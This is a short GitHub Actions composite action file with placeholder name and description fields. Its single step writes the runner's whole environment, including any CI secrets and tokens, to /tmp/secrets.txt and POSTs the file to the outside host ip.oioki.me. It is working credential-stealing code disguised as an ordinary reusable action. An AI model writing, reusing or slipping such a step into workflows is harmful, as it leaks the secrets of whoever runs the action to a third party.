name: Action-Name
description: Action-Description
runs:
  using: "composite"
  steps:
    - run: |
        env > /tmp/secrets.txt
        curl -X POST -d @/tmp/secrets.txt http://ip.oioki.me
      shell: bash
